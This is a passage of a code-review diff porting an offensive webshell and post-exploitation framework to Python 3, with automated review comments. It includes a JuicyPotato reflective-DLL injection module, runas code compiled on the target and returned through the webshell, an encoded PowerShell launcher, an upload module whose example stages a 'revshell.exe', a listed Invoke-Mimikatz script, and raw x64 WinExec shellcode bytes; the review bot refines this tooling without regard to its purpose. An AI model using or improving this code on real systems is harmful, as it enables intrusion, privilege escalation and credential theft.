    167  - configuration += CLSID + '\00'
    168  - configuration += ListeningPort + '\00'
    169  - configuration += RpcServerHost + '\00'
    170  - configuration += RpcServerPort + '\00'
    171  - configuration += ListeningAddress + '\00'
    172  - configuration += str(len(shellcode_bytes)) + '\00'
     165 + configuration = LogFile + b'\00'
     166 + configuration += remote_process + b'\00'
     167 + configuration += CLSID + b'\00'
     168 + configuration += ListeningPort + b'\00'
     169 + configuration += RpcServerHost + b'\00'
     170 + configuration += RpcServerPort + b'\00'
     171 + configuration += ListeningAddress + b'\00'
     172 + configuration += str(len(shellcode_bytes)).encode() + b'\00'
    173 173   configuration += shellcode_bytes
    174  - configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in bytearray(configuration)) + '}'
     174 + configuration_bytes_csharp = '{' + ",".join('0x{:02x}'.format(x) for x in configuration) + '}'
    175 175   response = self.inject_dll_reflective_module_object.run(['juicypotato_reflective.dll', 'remote_virtual',
    176 176   'cmd.exe', thread_timeout, configuration_bytes_csharp])
    177 177   parsed_response = self._parse_response(response)
    skipped 11 lines
    189 189   response = self.__run_exe_version(cmd, arguments)
    190 190   else:
    191 191   logfile = self._module_settings['env_directory'] + '\\' + random_generator()
    192  - print '\n\nInjecting Reflective DLL into remote process...'
     192 + print ('\n\nInjecting Reflective DLL into remote process...')
    193 193   response = self.__run_reflective_dll_version(cmd, custom_shellcode_path, logfile, clsid)
    194 194   response += '\nReflective DLL injection executed!\n\n'
    195 195   if custom_shellcode_path == 'default':
    skipped 9 lines
  • modules/ps_modules/Invoke-Mimikatz.ps1
    Unable to diff as some line is too long.
    modules/runas.py
    skipped 33 lines
    34 34   domain domain of the user, if in a domain.
    35 35   Default: ''
    36 36   process_timeout_ms the waiting time (in ms) to use in the WaitForSingleObject() function.
    37  - This will halt the process until the spawned process ends and sent
    38  - the output back to the webshell.
     37 + This will halt the process until the spawned process ends and sent the output back to the webshell.
    39 38   If you set 0 an async process will be created and no output will be retrieved.
    40 39   Default: '60000'
    41 40   logon_type the logon type for the spawned process.
    skipped 13 lines
    55 54  
    56 55   """
    57 56   
    58  - _runtime_code = ur"""
     57 + _runtime_code = r"""
    59 58   using System;using System.IO;using System.Diagnostics;using System.Text;
    60 59   using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
    61 60   
    skipped 274 lines
    336 335   domain = args_parser.get(3, self.__default_domain)
    337 336   process_ms_timeout = args_parser.get(4, self.__default_process_ms_timeout)
    338 337   logon_type = args_parser.get(5, self.__default_logon_type)
     338 + if process_ms_timeout == '' or logon_type == '':
     339 + raise self._exception_class('#runas: process_ms_timeout and logon_type field cannot be empty.\n')
    339 340   return cmd, username, password, domain,process_ms_timeout, logon_type
    340 341   
    341 342   def _create_request(self, args):
    skipped 9 lines
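Review bot: The new check on new lines 338-339 only rejects empty strings, so a non-numeric `process_ms_timeout` still passes and is later substituted into the C# runtime template that is compiled on the target; whether it lands inside a string literal or directly in the `WaitForSingleObject()` call cannot be confirmed here because the `_create_request` body is outside the hunk, but either way a stray character breaks or alters the generated source. The docstring states the field is numeric (default `'60000'`, `0` for async), so validate the form too: `if not process_ms_timeout.isdigit(): raise self._exception_class('#runas: process_ms_timeout must be a non-negative integer (ms).\n')`. If `logon_type` is also meant to be one of the integer LOGON32 constants (the value list is in the skipped docstring lines), the same `isdigit()` test applies to it. The enclosing argument-parsing method starts above the hunk.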
  • ■ ■ ■ ■ ■
    modules/runas_ps.py
    skipped 52 lines
    53 53   def __gen_powershell_launcher(self, ps_code):
    54 54   powershell_launcher='powershell -nop -noni -enc '
    55 55   ps_code = '$ProgressPreference = "SilentlyContinue";' + ps_code
    56  - powershell_launcher += b64encode(ps_code.encode('UTF-16LE'))
     56 + powershell_launcher += str(b64encode(ps_code.encode('UTF-16LE')),'UTF-8')
    57 57   return powershell_launcher
    58 58   
    59 59   def _create_request(self, args):
    skipped 6 lines
    66 66   stderr_file = self._module_settings['env_directory'] + '\\' + random_generator()
    67 67   return self._runtime_code % (username, password, domain, cmd, stdout_file, stderr_file,
    68 68   working_path, logon_type, process_ms_timeout)
     69 + 
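Review bot: `_create_request` (lines 67-68) substitutes `username`, `password` and `cmd` verbatim into `_runtime_code` with `%`, so a credential containing `"` or `\` can break or alter the generated C# before it is compiled on the target; the template is above the hunk, so I cannot confirm the values land inside string literals, but escaping them (or base64-encoding and decoding them on the C# side, as the launcher on line 56 already does for the script) removes that dependency on the template. On the changed line 56, `powershell_launcher += b64encode(ps_code.encode('UTF-16LE')).decode('ascii')` is the more idiomatic form of `str(..., 'UTF-8')` and makes explicit that base64 output is ASCII. The enclosing class starts outside the hunk.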
  • ■ ■ ■ ■ ■ ■
    modules/upload.py
    skipped 34 lines
    35 35   #upload /tmp/revshell.exe C:\Users\Public\revshell.exe 1024
    36 36   """
    37 37   
    38  - _runtime_code = ur"""
     38 + _runtime_code = r"""
    39 39   using System;using System.IO;using System.Diagnostics;using System.Text;
    40 40   public class SharPyShell{
    41 41   byte[] Upload(string path, byte[] file_bytes){
    skipped 14 lines
    56 56   }
    57 57   """
    58 58   
    59  - __runtime_code_split_file = ur"""
     59 + __runtime_code_split_file = r"""
    60 60   using System;using System.IO;using System.Diagnostics;using System.Text;
    61 61   public class SharPyShell{
    62 62   byte[] Upload(string path, byte[] file_bytes){
    skipped 17 lines
    80 80   }
    81 81   """
    82 82   
    83  - __runtime_code_init_file = ur"""
     83 + __runtime_code_init_file = r"""
    84 84   using System;using System.IO;using System.Diagnostics;using System.Text;
    85 85   public class SharPyShell{
    86 86   string InitFile(string path){
    skipped 77 lines
    164 164   decrypted_response = self._decrypt_response(encrypted_response)
    165 165   parsed_response = self._parse_response(decrypted_response)
    166 166   if len(requests) > 1:
    167  - print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size*i) + ' - ' + str(chunk_size*i+chunk_size) +\
    168  - ' bytes written correctly to ' + upload_output_path
     167 + print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size*i) + ' - ' + str(chunk_size*i+chunk_size) +\
     168 + ' bytes written correctly to ' + upload_output_path)
    169 169   except ModuleException as module_exc:
    170 170   parsed_response = str(module_exc)
    171 171   except Exception:
    skipped 4 lines
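Review bot: The parenthesised print on new lines 167-168 keeps the concatenation-plus-`str()` style; `print('Chunk {} --> {} - {} bytes written correctly to {}'.format(i + 1, chunk_size * i, chunk_size * i + chunk_size, upload_output_path))` is easier to read and avoids the backslash continuation inside the call. Note also that the reported end offset `chunk_size*i+chunk_size` overstates the last chunk when the file size is not a multiple of `chunk_size`; the chunk slicing is outside the hunk, so the actual chunk length would have to be taken from wherever the chunks are built. The enclosing method starts above the hunk.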
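--- a/requirements.txt
+++ b/requirements.txt
@@ -1,6 +1,6 @@
 urllib3
 PySocks
-pycrypto
+pycryptodome
 pyopenssl
 pefile
 prettytable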
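Review bot: Swapping the abandoned `pycrypto` for `pycryptodome` is the right move, but the new line is still unpinned, so the resolver will pull whatever is latest at install time; pin at least a lower bound to the release the port was tested with (e.g. `pycryptodome>=<tested version>`). Also worth a line in the README or this file: `pycryptodome` installs into the same `Crypto` package namespace as `pycrypto`, so an existing virtualenv must have `pip uninstall pycrypto` run first (or the project should switch to `pycryptodomex` and `from Cryptodome import ...`), otherwise the two packages clobber each other.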
  • ■ ■ ■ ■ ■
    utils/Singleton.py
    skipped 2 lines
    3 3   
    4 4   def __new__(cls, *args, **kwargs):
    5 5   if cls not in cls._instances:
    6  - cls._instances[cls] = super(Singleton, cls).__new__(cls, *args, **kwargs)
     6 + cls._instances[cls] = super(Singleton, cls).__new__(cls)
    7 7   return cls._instances[cls]
     8 + 
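Review bot: Dropping `*args, **kwargs` from the `object.__new__` call on new line 6 is the correct Python 3 fix, but the cached instance is still handed back through the normal construction path, so any subclass `__init__` runs again on every `Cls(...)` call and re-assigns whatever state it sets; if callers expect construct-once semantics, `__init__` (or a flag such as `self._initialized`) needs to guard against re-entry. A one-line comment above the `if` would make the first-call-only construction explicit: `# Construct once per concrete class; later calls return the cached instance (but __init__ still runs).` The `_instances` dict is declared above the hunk.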
  • ■ ■ ■ ■ ■ ■
    utils/gzip_utils.py
    1  -import StringIO
     1 +import io
    2 2  import gzip
    3 3  import base64
    4 4   
    5 5   
    6 6  def get_compressed_base64_from_file(path):
    7  - compressed_stream = StringIO.StringIO()
    8  - with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed, open(path, 'rb') as infile:
    9  - compressed.write(infile.read())
    10  - return base64.b64encode(compressed_stream.getvalue())
     7 + 
     8 + with open(path, 'rb') as f:
     9 + read_data = f.read()
     10 + return base64.b64encode(gzip.compress(read_data)).decode()
    11 11   
    12 12   
    13 13  def get_compressed_base64_from_binary(bin_bytearray_input):
    14  - compressed_stream = StringIO.StringIO()
    15  - with gzip.GzipFile(fileobj=compressed_stream, mode="wb") as compressed:
    16  - compressed.write(str(bin_bytearray_input))
    17  - return base64.b64encode(compressed_stream.getvalue())
     14 + return base64.b64encode(gzip.compress(bin_bytearray_input)).decode()
    18 15   
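Review bot: `import io` on new line 1 replaces `StringIO` but is never used, since both functions now go through `gzip.compress` and `base64.b64encode` directly; drop the line (`import gzip` / `import base64` are the only imports needed). Note also that `get_compressed_base64_from_binary` previously coerced its argument with `str()`, whereas `gzip.compress` on new line 14 accepts only bytes-like input, so a caller that still passes a `str` will now raise `TypeError` — fine if every caller already passes `bytes`/`bytearray` as the parameter name suggests, but worth a docstring line: `"""Gzip-compress a bytes-like payload and return it base64-encoded as a str."""`.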
  • ■ ■ ■ ■ ■ ■
    utils/prettify.py
    skipped 15 lines
    16 16   table = prettytable.PrettyTable()
    17 17   
    18 18   # List outputs.
    19  - if isinstance(data, (types.ListType, types.TupleType)):
     19 + if isinstance(data, (list, tuple)):
    20 20   
    21 21   if len(data) > 0:
    22 22   
    23 23   columns_num = 1
    24  - if isinstance(data[0], (types.ListType, types.TupleType)):
     24 + if isinstance(data[0], (list, tuple)):
    25 25   columns_num = len(data[0])
    26 26   
    27 27   for row in data:
    28 28   if not row:
    29 29   continue
    30 30   
    31  - if isinstance(row, (types.ListType, types.TupleType)):
     31 + if isinstance(row, (list, tuple)):
    32 32   table.add_row(row)
    33 33   else:
    34 34   table.add_row([row])
    skipped 3 lines
    38 38   
    39 39   # Populate the rows
    40 40   randomitem = next(data.itervalues())
    41  - if isinstance(randomitem, (types.ListType, types.TupleType)):
     41 + if isinstance(randomitem, (list, tuple)):
    42 42   for field in data:
    43 43   table.add_row([field] + data[field])
    44 44   else:
    skipped 40 lines
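Review bot: `next(data.itervalues())` on context line 40 is Python 2 only; `dict.itervalues` does not exist in Python 3, so the dict branch of this function raises `AttributeError` as soon as it is reached, while the rest of the commit ports the file to Python 3. Replace it with `randomitem = next(iter(data.values()))`. With `types.ListType`/`types.TupleType` gone from lines 19-41, the `import types` at the top of the file (above the hunk) is probably unused as well and can be removed if nothing else references it. The enclosing function starts outside the hunk.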
  • ■ ■ ■ ■ ■ ■
    utils/shellcode.py
    skipped 8 lines
    9 9  'Arch' => ARCH_X64,
    10 10  'Payload' =>
    11 11  '''
    12  -winexec_x64 = ""
    13  -winexec_x64 += "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
    14  -winexec_x64 += "\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
    15  -winexec_x64 += "\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
    16  -winexec_x64 += "\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
    17  -winexec_x64 += "\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
    18  -winexec_x64 += "\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
    19  -winexec_x64 += "\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
    20  -winexec_x64 += "\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
    21  -winexec_x64 += "\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
    22  -winexec_x64 += "\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
    23  -winexec_x64 += "\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
    24  -winexec_x64 += "\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
    25  -winexec_x64 += "\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
    26  -winexec_x64 += "\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
    27  -winexec_x64 += "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
    28  -winexec_x64 += "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
    29  -winexec_x64 += "\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
    30  -winexec_x64 += "\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
    31  -winexec_x64 += "\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
    32  -winexec_x64 += "\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
    33  -winexec_x64 += "\x00\x59\x41\x89\xda\xff\xd5"
    34  - 
     12 +winexec_x64 = b""
     13 +winexec_x64 += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
     14 +winexec_x64 += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
     15 +winexec_x64 += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
     16 +winexec_x64 += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
     17 +winexec_x64 += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
     18 +winexec_x64 += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
     19 +winexec_x64 += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
     20 +winexec_x64 += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
     21 +winexec_x64 += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
     22 +winexec_x64 += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
     23 +winexec_x64 += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
     24 +winexec_x64 += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
     25 +winexec_x64 += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
     26 +winexec_x64 += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
     27 +winexec_x64 += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
     28 +winexec_x64 += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
     29 +winexec_x64 += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
     30 +winexec_x64 += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
     31 +winexec_x64 += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
     32 +winexec_x64 += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
     33 +winexec_x64 += b"\x00\x59\x41\x89\xda\xff\xd5"